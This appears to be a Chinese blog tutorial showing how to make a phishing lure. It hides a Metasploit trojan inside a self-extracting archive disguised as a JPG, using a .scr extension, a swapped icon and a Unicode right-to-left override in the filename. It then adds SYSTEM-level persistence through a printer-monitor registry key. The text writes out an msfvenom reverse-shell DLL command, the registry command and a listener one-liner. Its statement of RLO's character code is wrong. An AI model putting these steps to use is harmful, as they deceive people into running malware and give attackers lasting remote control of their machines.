Phishing

$> 最近来了好多的兄弟，很开心，共同学习，共同进步！

0x01 前言

偶然在YouXbe上看见一个视频：

通过这个软件可以做到图片和木马程序绑定，点击之后图片正常显示，但同时会运行绑定的程序

这就让我很费解啊，有这技术，钓鱼还不要爽翻了？这要买一个这个工具，钓鱼不是起飞了，但是作为一个资深白嫖党，怎么可能会花这个钱呢 ，穷是驱动力，通过翻看这个视频，还真被我找到了其中的端倪。

0x02 揭秘

这个软件本质上实现了两个功能：自解压和更改后缀

• 自解压

所谓的自解压很简单，例如winrar这类压缩软件除了正常压缩为rar、zip等后缀以外，还可以压缩成exe文件，双击exe文件后，文件会被自动解压，而且通过配置可以做到不展示解压过程、指定解压目录和执行指定的程序

我下载一个jpg文件，用msf生成一个木马 winUpdate.exe，然后使用自解压将其压缩：

在高级中配置自解压选项：

解压路径：

指定程序运行：

隐藏解压过程：

此时会生成desktop.exe，这样双击之后它会自动解压，且会先运行解压到c:windowstemp目录下的1.jpg，然后运行winUpdate.exe。

• 更改后缀

exe太扎眼了，也不符合视频里的所谓的绑定图片和木马的规矩，Windows里常见的可执行程序后缀有exe、msi、sys等等，还有一个后缀其实一直不太引人注目，就是scr，即屏幕保护程序，所以视频里做的其实就是更改了后缀为scr：

• 加注

仅仅是这样的话，还是有点low，所以我准备再加几个隐蔽的措施

• 修改图标

用ResourceHacker可以修改图标，将图片1.jpg转成ico，再使用工具替换原有图标：

由于原始图片有点小，转换后的照片也会比较模糊，用大图片就不会有这个问题

• Unicode翻转改后缀

Unicode定义的 Start of right-to-left override，控制字符是RLO，ASCII码是0x3F，Windows下可以插入RLO，实现文本倒序

将desktop.scr重命名为如 gpj.scr,在k后面右键点击插入unicode字符，插入RLO

0x03 最后

双击程序上线：

看看解压路径：

0x04 最最后

那么既然msf已经成功上线了，我们肯定想做一下权限维持，让他能够一直上线，所以这里再提一嘴权限维持：

用注册表做开机自启的权限维持已经是老生常谈了，但普遍会在下面两个地方做（或者是HKLM）：

• HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
• HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce

这里提一个更隐蔽的地方，但是前提是已经是administrator权限：

系统引导期间，各种服务会调用加载各自的DLL，打印机监视器可以通过调用AddMonitor API来设置在启动时加载的DLL。此DLL位于c:windowssystem32中，将由spoolsv.exe,引导。其进程也在系统级权限下运行。

使用MSF生成一个DLL：

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.196 lport=4444 -f dll > inj.dll

拿到shell后，通过具有管理员权限的meterpreter会话将生成的DLL注入到c:windowssystem32目录中，然后执行命令：

reg add "hklmsystemcurrentcontrolsetcontrolprintmonitorsignite" /v "Driver" /d "inj.dll" /t REG_SZ

测试过程发现会dll上传到sysWow64里，此时移动到system32就行

MSF重新监听：

./msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.31.196; set lport 4444; run; "

重启靶机：

上线而且是system权限